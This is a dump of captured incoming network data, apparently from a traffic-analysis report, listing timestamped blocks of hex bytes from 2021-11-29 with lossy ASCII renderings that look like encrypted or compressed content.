                                              2021-11-29 10:29:51 UTC132INData Raw: 23 a1 08 56 61 ed 02 cd 7f 47 aa 24 ba dc fc bd 5a c8 de ba d9 a2 25 9d c0 2a e0 28 69 26 9e 11 bb ab fe f3 16 70 21 bb 24 e5 1f 90 e0 31 1f 6f db 24 ae a5 68 8d d8 cf 58 f8 e8 86 69 e7 cf b5 5e 99 7d 3e ad b1 86 9b 02 c3 f1 c2 16 61 1c 38 7f 0f dc 3d f3 db 0a 0d 8d c9 f6 07 e0 2c 20 a1 56 8e f4 00 be 5e 38 13 a1 15 a1 7f ce 10 1b 2b 00 ff 9e 29 88 f9 8c 7f 06 28 5a b7 82 3e 35 43 06 37 68 5c 17 82 5d 44 dc 6c 80 41 ba b7 ab 83 83 2b f6 21 42 ff 06 8c b5 ee ec f2 7b 23 00 00 70 30 60 c3 0a f4 07 05 f5 17 c7 c8 7a 8e 10 e9 82 a3 b3 6c bd 06 49 5e d2 6b ff 4d c3 01 b0 08 95 43 cc f0 7c 8b 59 f9 95 d0 a8 e9 b7 c1 78 15 36 50 46 f9 0d 94 96 bb c9 f2 e0 e0 9e 34 2d 49 14 7d 4d 37 53 e9 76 9e d3 30 8e cd e7 57 54 13 61 cb 9a cd 0c 67 0b 30 11 eb b5 e3 50 20 d8
                                              Data Ascii: #VaG$Z%*(i&p!$1o$hXi^}>a8=, V^8+)(Z>5C7h\]DlA+!B{#p0`zlI^kMC|Yx6PF4-I}M7Sv0WTag0P
                                              2021-11-29 10:29:51 UTC134INData Raw: 46 3a bc af fd be e9 77 34 1d 61 7d 5f 93 fd de 62 c4 20 ae 53 ad d6 a3 f2 2f a2 5e d1 38 ff 2b e6 c5 f2 61 45 e3 a4 84 c9 b6 2f 8f eb 51 81 95 f7 bc ea ea 18 6e 51 6e 7d 7e 04 26 33 a9 04 79 fd 44 5d 4b 22 e0 e0 68 45 48 ad a3 c2 3c 82 6f a5 3f ad 51 e0 79 7b 91 3f af e2 63 78 45 8e b2 47 66 84 cd d5 d2 ae 86 8e c9 d5 56 86 3e 33 f3 84 c9 2d 23 d5 28 08 b8 40 aa fb a5 31 18 3e b8 bb 76 81 f9 a2 1c f2 f7 fa fe ee 9a 6c f4 98 5a 8d a6 fc 5f 06 36 b5 87 4a f1 91 b3 79 b6 c8 63 b6 55 e7 1b c0 0f 95 50 b6 3a c0 4b f3 68 64 39 b8 0a e2 23 72 bb 89 6d f7 58 11 0b e1 05 dd a6 56 17 5e 7c 36 39 0a 97 37 8c 9e 16 25 00 08 b3 df c5 e5 71 de a0 88 f4 b6 43 25 fb bc ad f1 c1 77 8d 92 e1 41 c8 5d 2e e2 92 f7 a5 79 6c be 62 92 b9 b5 53 9c ab 34 03 b3 3f ef 92 63 29 49
                                              Data Ascii: F:w4a}_b S/^8+aE/QnQn}~&3yD]K"hEH<o?Qy{?cxEGfV>3-#(@1>vlZ_6JycUP:Khd9#rmXV^|697%qC%wA].ylbS4?c)I
                                              2021-11-29 10:29:51 UTC135INData Raw: b4 c1 1b 9e ae 08 fe 23 76 7f 53 72 12 76 be de 02 93 c3 f8 44 63 33 4b e6 9e e7 8c 33 10 4f 88 ee 95 a4 71 dc d8 08 31 2d c4 69 4a 1b 31 53 eb 20 e5 bd 8a 0b 96 22 df ae ef b1 90 37 ae d7 45 1f 15 52 6b ce 03 ab 37 91 3d 8d 7c a3 fa b3 88 4c 22 28 65 c3 e6 1a f7 b8 a3 f6 21 2e 0c bc 4d af da d4 12 6f de 34 46 33 a3 78 a3 6d 38 d5 23 a7 b3 fe 1e d0 ae 3a 02 c2 4a be d0 87 27 e4 e4 b1 e1 42 3c 74 fc dd 7a db ed 72 2b ab 70 0a 35 bc 30 75 b0 2f c1 88 a0 4a d4 10 65 0b 57 23 a2 f2 b3 09 01 6b a7 88 85 05 78 30 c1 ee 9c bb 38 f9 a8 e8 a7 fd e0 91 0b ab 9e 21 7f 07 c3 f0 f0 21 3f 27 d6 9b 22 ae 71 a4 e6 77 ca 21 f6 97 22 cd 38 80 c1 6d 16 67 f8 3f 45 2e bd 30 83 e3 78 5c ca b3 3b 43 13 1f 65 3c bc e5 78 79 89 49 e2 78 da 5d 90 a5 5c f1 74 3b 12 82 e6 b4 2f 94
                                              Data Ascii: #vSrvDc3K3Oq1-iJ1S "7ERk7=|L"(e!.Mo4F3xm8#:J'B<tzr+p50u/JeW#kx08!!?'"qw!"8mg?E.0x\;Ce<xyIx]\t;/
                                              2021-11-29 10:29:51 UTC136INData Raw: 77 8b a8 27 ac f7 ef d5 d1 0a e0 41 56 58 6a f1 b4 d7 1d 5d 41 af 64 dc c0 b4 53 83 81 6e 3b b1 3f f7 90 cc 55 d0 ad 4c 69 15 93 ff 07 23 cb 0f 8a 45 fd 5f b6 d3 e7 59 bf 37 d9 9d e8 d2 39 fa b8 df 78 8b 59 9f a9 73 ac a1 df b1 ae 6c e9 22 bb 56 6a a8 be 99 db 6f e5 e3 a2 df be f9 77 5b 88 c0 b0 df 2d 55 02 be e2 91 29 80 4a 17 7e 25 9b 52 cc 32 92 7a 12 18 fc 83 9d c3 a4 6c ad 0e 4d 4d f8 72 b8 6c db eb 95 ae b3 fb 40 14 b4 88 9f 22 b4 d8 ef 14 fb 3f 3f ef 57 65 51 f2 df 2a da 0a dc f6 9d da 0a 19 aa 74 79 f2 2a 38 00 a9 1c a1 11 9b 39 e2 12 1b b7 0f 50 f2 96 a9 97 89 5f fe 08 c8 a2 18 1b 07 5e 08 3a 92 5c 11 a8 fb 36 4b 6d 80 5c b2 f5 a8 83 85 9b 51 72 c9 d8 26 e7 94 17 ec d2 e5 ac 25 2d 7e 36 68 17 08 f4 01 0f 7c 67 5e c9 67 a2 1d 9b 83 a5 99 74 e6 b2
                                              Data Ascii: w'AVXj]AdSn;?ULi#E_Y79xYsl"Vjow[-U)J~%R2zlMMrl@"??WeQ*ty*89P_^:\6Km\Qr&%-~6h|g^gt
                                              2021-11-29 10:29:51 UTC138INData Raw: ca 0f 73 22 a3 44 70 53 e2 81 2a 6b 38 37 e3 44 0f 62 06 e4 a8 00 e7 58 4a c6 b5 88 d4 f2 79 60 35 a2 76 95 f2 86 f9 d2 0e 68 22 07 53 c8 87 92 42 28 4b 1d 8d b7 13 f4 d2 13 2c bd d0 d4 c5 bb 82 ad 9e b2 86 36 71 a9 9e 9e 2c bc af c2 bd d1 5a 36 03 4f 7a db ed 62 f5 e4 be 99 3d 52 a9 f6 25 d6 02 b0 e2 d4 87 ec 0d c6 f9 22 76 45 c3 ae 98 e1 9b 32 ae c5 56 01 eb 68 97 6c 90 a1 fc 50 6a 5d f9 20 0b 22 15 01 c7 ee 62 7d 76 fe f7 e0 48 6a 70 80 a1 dd 33 80 c0 d9 a6 aa 7b 62 27 76 91 3f ab 58 58 54 54 a8 08 f6 4a 96 eb d5 2c b8 86 8e f2 c2 6b 84 3e 2a ca 2e 9a b6 22 d3 06 aa 53 d8 ab fb 3b 34 2a 2e 9e 9b 79 a5 d4 b3 1a 37 ff fb fe f3 92 13 e6 98 5c bc 0c af c4 07 30 9b 21 a2 69 90 b3 e7 b3 c5 73 90 75 eb 3f ed 1d 93 9c 81 3b c0 51 fb 12 76 39 be 3f 6b 75 c6 b8
                                              Data Ascii: s"DpS*k87DbXJy`5vh"SB(K,6q,Z6Ozb=R%"vE2VhlPj] "b}vHjp3{b'v?XXTTJ,k>*."S;4*.y7\0!isu?;Qv9?ku
                                              2021-11-29 10:29:51 UTC139INData Raw: 94 27 54 e9 da fe 06 a8 c7 0e ec f2 66 91 08 2f 61 10 6a b8 74 6d 06 25 fe 39 70 c9 67 a6 a7 ce af b4 bf ce 74 9e 48 5e f6 12 1c 4d c3 16 02 00 ba 52 ec fa 04 f5 c0 f8 b5 c2 86 51 b6 dc 50 a2 11 7d 51 f5 ab 52 0e ba c9 d6 9a 02 9e 34 31 fb 1c 52 5f 17 59 90 08 07 d2 10 97 e3 5e 56 4b 1e d3 c3 b5 dc 2c 6d 30 4f 88 ea 95 87 69 dc d8 8f 3c 2d d4 4f 6c 72 b2 2d 72 01 c5 ab aa b1 88 06 f7 19 c8 9c 87 3b 08 13 dd 1e 15 76 2c 93 02 ab 2b 23 35 a2 6e 83 f0 75 f7 d5 23 08 25 f1 5d 1b e8 a7 11 fe 0e 3f 2c b6 70 d0 43 d5 32 06 e7 71 47 2e 8b cf 84 40 2c d9 85 9c 2b ff 1e f4 ed 94 03 c2 55 00 dd 87 37 c2 c2 27 66 3c a5 55 88 c0 5a 9d f3 6a 03 1c 57 27 21 b0 92 4d 28 2e c1 ac 07 e5 d5 10 7a b2 5a 23 b1 d4 95 9e 86 15 3e a9 09 18 58 77 dd c6 b1 23 1d d2 90 4c f9 23 e0
                                              Data Ascii: 'Tf/ajtm%9pgtH^MRQP}QR41R_Y^VK,m0Oi<-Olr-r;v,+#5nu#%]?,pC2qG.@,+U7'f<UZjW'!M(.zZ#>Xw#L#
                                              2021-11-29 10:29:51 UTC140INData Raw: b0 ae 0c 5c 06 30 bf 1c 2f 68 90 ab 55 bb ea 62 b0 7f fb 40 74 1c b3 74 b6 e5 c1 4b d3 a5 51 14 aa 33 cd d5 5e b9 89 4b c2 c1 6f 92 ff 0e f1 ab 75 16 58 56 2a 62 be 87 11 a8 9f c8 24 00 28 4f ea e8 f7 49 d6 52 8b f4 b0 49 89 9e 25 ac ee d5 7f 82 91 e1 47 78 fe 7d 69 b5 d7 83 58 8c bf 42 fc 33 90 7e 91 87 3c ce b0 3f e9 98 db 4c d0 ab 79 c8 43 27 fc 07 21 c1 e7 f5 dc fc c5 97 de 17 7e 9f 5d 42 b8 c5 e3 65 cf 59 de 62 a3 54 c0 b2 75 86 3a 89 05 ad 6c eb 28 52 29 f3 a9 24 b8 d6 9c c2 c3 c9 44 9b d4 46 03 bd 22 b1 c5 05 58 60 a5 e4 bb b6 d6 fe 14 7e 27 91 b8 b3 ab 93 e0 33 15 0e a4 bd af 3f 49 80 3c e9 78 1b 73 a3 44 d6 8e 8e a8 99 62 2b a5 98 8a 9b 04 f3 5f 91 8d 60 1a 16 dd 95 44 3c f3 45 0f d7 9f ef d6 79 c4 01 31 a7 0a 62 f4 00 a1 77 18 30 a3 15 bd 7d 65
                                              Data Ascii: \0/hUb@ttKQ3^KouXV*b$(OIRI%Gx}iXB3~<?LyC'!~]BeYbTu:l(R)$DF"X`~'3?I<xsDb+_`D<Ey1bw0}e
                                              2021-11-29 10:29:51 UTC141INData Raw: bc 30 37 b3 2f c1 88 f2 44 d4 10 65 23 57 23 a2 f2 b3 09 05 6b a7 88 85 05 78 72 c2 ee 9c bb 38 f9 ab e8 a7 bf e3 91 0b ab d4 2f 7f 07 c7 fc f5 0e 3d 21 fa 37 da 49 e9 a5 e2 53 ec 6b f7 97 b8 72 30 bf f5 6b 30 2d f9 3f 65 eb 6f 22 83 fc 6b 7b cf 9c 39 45 3f b3 9d db 24 e4 7c 5d ae 02 e3 78 40 e2 98 9a 68 f7 53 70 13 82 c6 65 ee 86 d9 77 0f 40 0f 1a 5a e6 80 12 3c b7 60 9b f7 0e 1a f6 d6 33 27 99 fd c5 79 be a7 bd b8 92 37 30 6c a9 be 43 13 91 ad dd b5 d3 f1 4a 9a 48 50 59 b3 f2 f6 e4 ba 23 8a 7e bb d0 9f fa 2d a2 c4 d4 1a f0 0d c6 c6 f8 49 68 c1 b1 92 e3 30 4e 37 c2 7c 87 b5 fb 94 6c 94 1b 4a 7c 78 7b 43 0f 24 33 33 01 4e f2 62 7d 49 2f c8 cd 4a 73 5e 87 25 a3 ac ab 42 a3 1f a0 79 66 07 78 b5 12 b9 e4 5d 72 47 8e 28 42 6d 8b eb f5 d3 a2 ae a3 eb ea 40 ac
                                              Data Ascii: 07/De#W#kxr8/=!7ISkr0k0-?eo"k{9E?$|]x@hSpew@Z<`3'y70lCJHPY#~-Ih0N7|lJ|x{C$33Nb}I/Js^%Byfx]rG(Bm@
                                              2021-11-29 10:29:51 UTC143INData Raw: bb 29 db d9 ef 8e 44 37 00 db 51 6e 3e f3 df 0a d7 ad c9 f6 82 9d 29 1c 85 76 7f de 82 c0 e7 31 1d a5 35 97 55 e3 12 81 08 07 6c c6 90 a5 fb 88 5f de ad 7a b7 18 00 30 7f 22 17 96 76 91 fc e4 49 d2 68 a0 75 90 9a a9 19 a0 2c 66 79 fb d3 04 88 95 37 66 d2 7b b9 3a 20 49 3b 42 3a 0c de 81 5b 63 18 c7 cc 47 88 3f eb 82 3f bc c3 d1 b9 68 70 d4 4b 05 6d 54 21 2a 2d a7 5f c2 fd 84 8b 5f d3 33 b8 3f e8 b7 d8 70 17 36 50 40 49 ae c7 1d 9c e9 d9 c2 1b 9e 14 89 f3 31 50 40 1c 5b 3f 74 9e d5 3a 15 bd 7e 56 4b 1a 69 d6 9a cd 0a d7 ac 63 9a cc 95 d7 72 dc d8 b2 a5 20 d6 4f 75 55 18 7e e9 00 c3 85 0c 75 10 07 f7 87 cd 80 94 1d 28 33 f9 33 07 70 6b bb 00 ab 37 2b a6 80 6e 85 c5 fc a1 61 20 08 27 fb 64 64 71 a6 8b df 03 1c 08 96 cb 4b 66 f8 03 4d de 43 45 33 a3 c2 4f 60
                                              Data Ascii: )D7Qn>)v15Ul_z0"vIhu,fy7f{: I;B:[cG??hpKmT!*-__3?p6P@I1P@[?t:~VKicr OuU~u(33pk7+na 'ddqKfMCE3O`
                                              2021-11-29 10:29:51 UTC144INData Raw: 62 f5 26 34 a2 dd 31 8a 10 a5 3f ab e1 43 2a f0 b6 1f f9 c0 7d 79 65 77 0a 62 4b 89 f1 dd e1 ad 86 88 c3 6c 38 1f 3f 2c e4 8c b7 2d 23 d3 98 af eb cb 8d db f2 13 07 3f 98 a8 cf a4 d4 ac 22 fa c5 f9 fe e8 90 b8 9a 01 5b 96 8a f1 09 04 30 9f 9b 11 45 82 95 5d c2 ea 62 b6 75 56 1d ed 1d ac 64 be 16 c2 4b d5 15 f6 47 21 14 ed 0f 7f ec 8b 6b dd 40 4a bf f1 23 f9 d3 75 16 5e 5c 93 3f 27 86 0f 84 92 15 25 06 02 53 b1 5c e4 6f f2 ad dc f6 b0 69 39 a0 08 be d7 e5 01 ad 93 e1 61 15 5b 03 f0 ab cf af 55 6e be 44 d6 2f cb ca 82 a1 18 0e e6 3d e9 b8 7b 72 fd b9 40 cb 3c 08 fe 07 07 b4 46 8b 45 e2 d5 bb d3 f4 7f 99 77 5e e3 71 f3 43 eb 98 87 60 a3 74 07 8c 58 94 05 81 70 ad 6c ed 22 bf 74 6a a8 3b a4 de 53 c1 c3 cf f4 38 87 ce 24 9d c4 90 9c 07 78 00 24 c1 96 b9 d8 f3
                                              Data Ascii: b&41?C*}yewbKl8?,-#?"[0E]buVdKG!k@J#u^\?'%S\oi9a[UnD/={r@<FEw^qC`tXpl"tj;S8$x$
                                              2021-11-29 10:29:51 UTC145INData Raw: 12 0b 18 bf 4f ad f7 f5 89 4a 08 8e 5f 48 e7 1a ec 87 f2 d9 23 2e 90 b3 e6 c3 65 f5 6b 69 fe 71 67 61 86 e2 86 5f 23 db 2e e0 b2 f8 34 76 b3 b1 03 c2 51 ba 82 a8 25 e4 78 be 4a 2e 83 55 86 db 5a 9d cc 29 0e 31 55 38 06 b2 3d 31 b1 29 eb 2e 59 c1 d5 10 7e 08 04 0c a0 f2 2f 06 aa 07 18 a9 fe 03 58 77 e0 92 b9 21 1d cb 92 e6 aa b8 e1 97 21 09 4a aa 7e 07 d8 f4 a4 0e 3d 27 4a 94 89 c1 ce 85 9a 71 ea 69 d7 33 07 57 1d ba fb 66 34 2f ff 15 c7 70 ea 23 83 e7 47 2e e0 9e 39 d9 30 18 f2 64 05 99 7a 7d a9 20 46 5d da c7 a2 a0 63 d5 54 74 39 04 98 0d f3 86 dd 48 67 6a 22 18 c0 c5 87 82 64 0e 1f 99 f3 2e 32 52 f3 33 bd a3 df fc 72 9c af b9 92 14 69 ae 70 a9 ba 7d 44 be af dd 29 dc 5a 26 25 69 2f 5f 93 fb d4 51 9f b9 af 4c a7 de 92 f1 2f a4 ee 72 6b 74 0c c6 dd d3 e1
                                              Data Ascii: OJ_H#.ekiqga_#.4vQ%xJ.UZ)1U8=1).Y~/Xw!!J~='Jqi3Wf4/p#G.90dz} F]cTt9Hgj"d.2R3rip}D)Z&%i/_QL/rkt
                                              2021-11-29 10:29:51 UTC146INData Raw: 13 73 12 56 09 f5 10 93 dc f2 7f 66 1c 49 e0 b2 4f 74 d4 88 4e 8c ca 3a e5 70 dc 42 b7 39 11 f0 6f e5 5a 30 53 cb ac e3 af 8a 1c a1 2b f5 83 eb 9b 14 63 b1 a8 dc 1a 35 c6 49 8a 02 31 12 26 09 86 4e 15 d8 f7 89 6c 8f 2e 21 d1 fe 32 c5 a5 8b dd 09 ac 74 0f ca d1 47 f5 83 69 fe 71 dd 16 8e f3 a0 60 bb f1 03 e2 92 51 38 f0 cd 3f 2a ef 57 9a fe 80 a7 9a 7b 9a 67 38 85 e7 fe d9 5a 07 c9 5f 3a 17 75 b5 25 9a 10 13 01 09 c1 a8 3f 70 f9 12 7a 2e 55 8c de 6b b4 23 83 35 ad 8b 85 01 c2 52 ed ff ba 01 8e d6 ba ce a7 08 c7 91 0b 9c 1c 1e 7d 07 da fe 5a 72 a4 26 d0 b5 84 44 ea a5 e6 e9 cf 44 e6 b1 02 c3 1f ad d3 6b 85 09 f9 3f 5d 26 5e 20 83 e5 4d d1 9c 07 38 43 11 15 76 40 25 e4 e2 58 84 11 c5 58 4f c5 b5 88 6e 62 72 72 13 95 ce b9 f0 86 df 42 9b 16 bb 19 5a e4 8a 06
                                              Data Ascii: sVfIOtN:pB9oZ0S+c5I1&Nl.!2tGiq`Q8?*W{g8Z_:u%?pz.Uk#5R}Zr&DDk?]&^ M8Cv@%XXOnbrrBZ
                                              2021-11-29 10:29:51 UTC147INData Raw: e1 41 4b 50 2e f2 b4 d1 ad fa 12 27 43 fc ad 95 e5 81 a1 1c b4 94 12 f8 9e c1 e1 d2 ab 66 cb b7 2d fe 07 3e c3 48 89 45 fb ef 15 80 6f 7e 9f 59 f8 2a ea f2 43 75 9d f2 70 85 54 2a ab 75 86 03 7e 0f af 6c f2 0b f8 7a 68 a8 22 96 74 00 5a c2 c9 da 9e 41 55 25 9d 5a 95 e8 14 5e 20 06 e6 bb ab de 3b 31 7e 21 a5 16 e0 30 92 e6 1d b3 93 3c bc af a1 4c 14 2c cf 58 62 57 8e 56 d0 c9 2c aa 99 7d 1e 7d 92 88 9b 1d d5 f1 c2 16 61 1c 38 7b 0f dc 3d f3 db 0a 40 8f c9 f6 07 e0 2c 23 a1 56 c3 f6 00 be 5e cc 3a a1 15 a4 5e cb 3f 19 2d 2c 57 66 ce 10 f8 88 5b de 93 58 b7 18 81 3d 7f 32 31 b0 e7 15 82 7d 68 d7 44 80 58 8d 95 81 ae 87 01 72 75 5d 80 9f 89 95 13 cc 4e 79 b9 25 b7 44 3b 52 1c 2a 48 05 25 fa 39 d3 e0 67 a6 22 fd aa 88 9b ee c5 b5 ce 20 4f 4a 05 49 e3 bc 28 2d
                                              Data Ascii: AKP.'Cf->HEo~Y*CupT*u~lzh"tZAU%Z^ ;1~!0<L,XbWV,}}a8{=@,#V^:^?-,Wf[X=21}hDXru]Ny%D;R*H%9g" OJI(-
                                              2021-11-29 10:29:51 UTC148INData Raw: 1f 63 c9 37 e3 42 05 f8 53 7d a9 1f c7 50 f7 c5 b5 8e 64 51 2a eb 12 82 e2 b4 2f 84 d9 68 83 4d 0f 0a 7c c0 77 92 42 2e 41 db d8 2e 12 eb df 1b 90 be d0 d2 75 18 d1 26 b9 92 13 17 af ab be 5d a1 99 82 cf 95 d9 a9 36 03 49 70 14 b8 fb f4 fb b1 91 82 51 a9 f0 95 75 51 3b c5 f4 11 cd d2 c4 d9 f3 fb 60 ee a3 b2 e9 69 32 ae c3 5c d7 be f1 96 73 9b a9 42 53 6a 5b 49 83 58 aa 32 21 50 cf 82 7f 56 23 7a c5 65 61 7e 8d 43 df 35 aa 62 c4 14 ab 7b 79 0b ca bd 3d ab c4 57 ff 3b 17 29 62 4f b6 0a f7 cc af 1c ab c4 f8 60 a6 df 2e e0 ac c4 40 08 d3 02 95 e2 f1 86 f9 a1 17 2d bd c6 22 ed a4 d0 93 d8 d0 e8 fb 64 cb 97 2f c2 b8 b8 94 8e d1 7d 95 1b 9f 01 2c 40 bd b1 7d 90 c2 e0 c8 cc 7c 3e e9 3d 50 72 96 3b 5a 6e fe 2e 52 19 5b 17 ed 0b 7f 2c a2 6b dd c4 47 bf e2 05 df ac
                                              Data Ascii: c7BS}PdQ*/hM|wB.A.u&]6IpQuQ;`i2\sBSj[IX2!PV#zea~C5b{y=W;)bO`.@-"d/},@}|>=Pr;Zn.R[,kG
                                              2021-11-29 10:29:51 UTC150INData Raw: ec f2 e1 9c 08 3f 47 36 43 39 0a f4 27 39 d7 19 c7 d7 76 8e 10 e9 82 a3 b3 68 bd 06 49 5e d2 6b 01 4e c3 01 b0 08 95 40 cc f0 82 88 59 f9 95 eb 8b e9 b7 c3 41 10 19 52 40 d5 a1 6c 71 23 c8 f6 c4 3b 9b 37 2d d3 ab 75 72 03 55 32 73 9d d3 10 b3 fd ca 57 4b 01 46 ce b5 cf 0a 4b a3 c8 f6 73 b4 e7 74 fc de 91 14 00 4c 6a 47 4a 16 73 ed 03 c5 af aa 46 a4 06 f7 9c e2 99 bb 1f 28 af f6 9c 6b cf 4a 8a 06 8b 30 08 18 a0 f4 a0 f7 e6 af 6c 25 0b 21 d1 c6 46 c5 a7 8b c5 0b 03 08 96 cd fb c1 ab 8b 6a fe 75 67 3b a0 e2 86 da 0f de 12 c4 92 f6 1d f0 cd 08 66 ef 55 9a e4 82 08 e6 e2 9d 4d ba db ec fd d9 5e bd e5 71 2b 31 cf 02 0a 88 36 13 b8 2c c1 a8 07 32 f9 10 7a 37 4d 26 8d f0 b5 25 ad 93 40 10 84 01 5c 57 ca ed 9c 21 87 f1 97 dc a1 9a eb 92 0b 8b 14 af 52 07 dc cb c3
                                              Data Ascii: ?G6C9'9vhI^kN@YAR@lq#;7-urU2sWKFKstLjGJsF(kJ0l%!Fjug;fUM^q+16,2z7M&%@\W!R
                                              2021-11-29 10:29:51 UTC151INData Raw: 05 25 fd 0a 4d c7 51 e6 da 81 72 93 22 f0 09 d4 6c fc 72 9d fd 81 12 a9 56 ba f0 0c 34 cc 64 66 d8 22 51 ff 99 dd 3a 58 5f 3f ef 56 2b d1 5c fd d2 7c 4a 69 4d c0 9f 88 b6 3c f6 d8 cc aa ec 66 a9 9d 79 ed 96 a2 61 ea f2 89 39 3a 02 74 df dd a5 ed 10 32 f9 0d 8d dd ce 76 bf f1 43 12 c5 4a d0 d6 8c 3b c3 e0 46 ca 3f 08 ff 50 36 fb 50 99 46 e8 81 b8 e5 e0 62 dc 03 e4 8e f8 f0 45 eb ac db 35 99 60 ba 87 07 ef 22 bd 22 97 42 c2 0c f0 7c 48 d6 41 a5 fd 73 a0 bd c4 c3 ae 91 24 3c 9c b6 a6 f5 34 a0 ce 65 3e 2f 24 1c 1b c3 fd a1 48 fd 09 f9 41 3f fe e8 30 3a 57 60 7d ac 3e d0 1f 83 2a fc 36 81 2e 27 69 4a 7a bf d2 62 53 7d 74 ed 30 2e 1e ef 96 ee d8 0c 88 ad d6 00 3e df 37 56 37 01 7a 40 99 b6 08 ec ca 4f 84 32 f9 bf 8b 34 d2 11 e6 45 aa 96 a6 a6 e7 72 39 2d 6f 0a
                                              Data Ascii: %MQr"lrV4df"Q:X_?V+\|JiM<fya9:t2vCJ;F?P6PFbE5`""B|HAs$<4e>/$HA?0:W`}>*6.'iJzbS}t0.>7V7z@O24Er9-o
                                              2021-11-29 10:29:51 UTC152INData Raw: bd f5 9b d0 a8 26 51 01 87 00 96 a8 cc dc 4c 37 0d bf b5 d4 61 4e 95 f5 8d cc b2 e6 d8 5d c7 7d 6b 34 4b b4 b4 a7 06 2c 31 c7 a5 b1 fa b6 de 8a 0f 8b 04 97 f0 1b 77 4c ca a7 3c 44 5a 90 43 66 30 2d 4e ee 9d 1d 20 92 fc 47 38 6e 65 a8 7f 1e c6 2d 44 b7 07 f2 76 da cc b7 d6 7b cc 5c 79 1d 93 eb 8c b5 b5 da 68 04 77 36 0d 5b c3 8e b6 31 30 79 88 be 05 3f d2 f8 35 97 99 f9 e5 65 b4 97 95 94 a1 64 0a 50 9e c1 7f 1e a5 8e 18 29 68 ee a9 c1 84 94 93 1e 36 34 2e 76 7c 78 88 66 3d 69 63 ff 6c 1e 68 d2 2f cb 19 02 2b bd ae 25 4a 70 2e 4d d4 1b 70 cc 36 54 10 7c 89 78 77 da aa 9c ae 95 f4 da c6 c5 9e af 09 92 d3 99 a6 65 6d 8f d4 d3 24 20 4b bf 2c ca 24 aa 13 ea f1 8c 5d 47 b5 39 4e a5 fe c4 12 b2 f1 c5 47 33 59 27 3b 0b 21 52 47 d7 10 92 9e 7d 1e 4c 99 94 6a a9 6f
                                              Data Ascii: &QL7aN]}k4K,1wL<DZCf0-N G8ne-Dv{\yhw6[10y?5edP)h64.v|xf=iclh/+%Jp.Mp6T|xwem$ K,$]G9NG3Y';!RG}Ljo
                                              2021-11-29 10:29:51 UTC154INData Raw: 61 54 3a e8 9e 57 f4 c9 cb e6 c7 97 5d 76 89 7b 29 ac 5a ff 54 58 7a c4 74 c6 66 cc 33 28 1d 49 1a d1 82 ae dd e8 01 d0 4b 79 84 63 66 65 36 0f 3d e1 27 6c 9c 36 43 d4 6e 80 46 c2 da e9 d3 d4 05 72 0d 88 a6 43 8b aa 51 ee b2 29 ad 39 33 64 5e 0b 28 10 d0 38 4d d0 38 e4 eb 58 d9 5c 88 f3 d3 bc cb b0 f3 31 38 f4 53 63 6c a2 7c 1f 12 87 70 83 b8 b5 4e 9c 25 3c 0b 66 29 75 0c ce ba b6 c6 d7 15 4f 66 82 20 4e 33 39 96 13 fb a2 4c e6 89 86 d1 f8 a4 9b 79 34 ea 3c 2c 05 b9 a7 ec f5 42 3c 79 bf b5 73 e0 27 56 14 00 ab 7f 7a 7f b9 b9 27 b4 91 c6 e5 87 64 81 44 37 47 8a 05 8a 79 17 37 77 50 d7 e3 33 44 d6 dc 88 88 03 b7 6a f4 80 d3 7b fd 20 7f 4b 7e e1 82 aa 98 61 4a b6 15 07 23 71 92 d4 b2 21 7e 60 ee 34 ed 9a 1d 91 f4 84 42 00 71 54 7a 98 7e 9e d1 af 0f fd 88 67
                                              Data Ascii: aT:W]v{)ZTXztf3(IKycfe6='l6CnFrCQ)93d^(8M8X\18Scl|pN%<f)uOf N39Ly4<,B<ys'Vz'dD7Gy7wP3Dj{ K~aJ#q!~`4BqTz~g
                                              2021-11-29 10:29:51 UTC155INData Raw: 54 c2 16 1e 69 95 cc 72 c2 a2 10 12 7f d1 51 0f 34 d5 bb 87 b9 d5 f8 bf bb 9c 26 f2 08 00 e7 aa ed 2c 2a e2 23 81 d4 d7 a0 f9 99 21 0e 21 b2 e2 d6 ba dc af 14 cd f7 ed e1 f7 bd 06 cf b9 7d ad 8d f7 7f 24 00 ee 07 44 6f e1 c2 08 f8 9e 0a d9 3f 13 4f 84 7b a3 66 ea 55 d5 5d b3 b8 ec a7 20 89 06 9f c4 2e 6c f9 39 49 9f 5f 2b db 0d 49 bd 88 b2 a5 72 db e6 53 80 54 67 d7 f5 b9 e0 1e 02 7e 5e da 42 22 31 43 70 d7 09 35 e2 07 5a 70 8f 03 3d 48 f1 f6 db ab 59 1a 78 57 a9 b5 17 9f 20 10 33 d1 0a 2c 88 bd 70 8e 6b 3e 24 fd 4a 20 ec 62 fb 84 67 d5 97 69 f1 19 d7 67 44 30 54 52 87 64 a6 51 62 19 75 b3 03 3d 2e 92 52 83 72 34 9a 1e d1 45 b6 38 89 10 e6 36 b6 87 4f 39 a5 98 6e d4 d5 a3 a4 f5 b4 13 6b cc 94 b4 a3 4d 26 5c e2 b4 f0 fe a2 8d 05 1e 79 ee 62 9c 75 b8 bb 4d
                                              Data Ascii: TirQ4&,*#!!}$Do?O{fU] .l9I_+IrSTg~^B"1Cp5Zp=HYxW 3,pk>$J bgigD0TRdQbu=.Rr4E86O9nkM&\ybuM
                                              2021-11-29 10:29:51 UTC156INData Raw: 68 30 69 ea d1 5a a9 8c 84 d7 24 26 06 91 96 98 7e f3 5b 74 b4 27 06 16 f2 c1 d4 10 05 ab 5a cf b7 ec 1e f1 ee 0d 2d f8 35 bc da 8e 3b e4 ce bb 56 08 cc 5d c7 eb 6e 98 d1 41 16 1b 74 06 14 bb 27 17 96 11 0e 7a bf 9c 1b cc a2 e0 af f2 70 32 60 f7 53 d8 f6 53 4e dd b9 bb 1d 3f 5a af 85 4b 27 50 5e 6e 18 6e e6 70 e5 cc 92 f9 2d 27 30 ff da d3 31 6b 4e 29 1b 58 1e de 29 86 0a 71 dc a2 f8 07 6f f0 f7 ed 64 a5 ce be f2 ae 12 74 e2 c0 5b 09 bc d5 9c be 73 c9 ba 68 e1 bd 73 dd 38 a0 70 51 22 1e eb 69 f2 cf af 2e 59 34 44 35 46 da ba dd 90 b8 f2 5a 16 2d ee 94 ce 35 40 9e a1 4a 75 8a 1d 35 8a 9e 04 c4 f6 ff e6 db 46 60 3e fa fd 08 7c e2 bd c8 a1 e9 65 23 11 5e 4b 13 8b e4 e8 fa cd e0 c4 2f d2 b2 d0 95 4f fb b4 96 7b 9f 6d ae af 9b 3d 37 b5 c9 e6 94 c6 42 df bb 3f
                                              Data Ascii: h0iZ$&~[t'Z-5;V]nAt'zp2`SSN?ZK'P^nnp-'01kN)X)qodt[shs8pQ"i.Y4D5FZ-5@Ju5F`>|e#^K/O{m=7B?
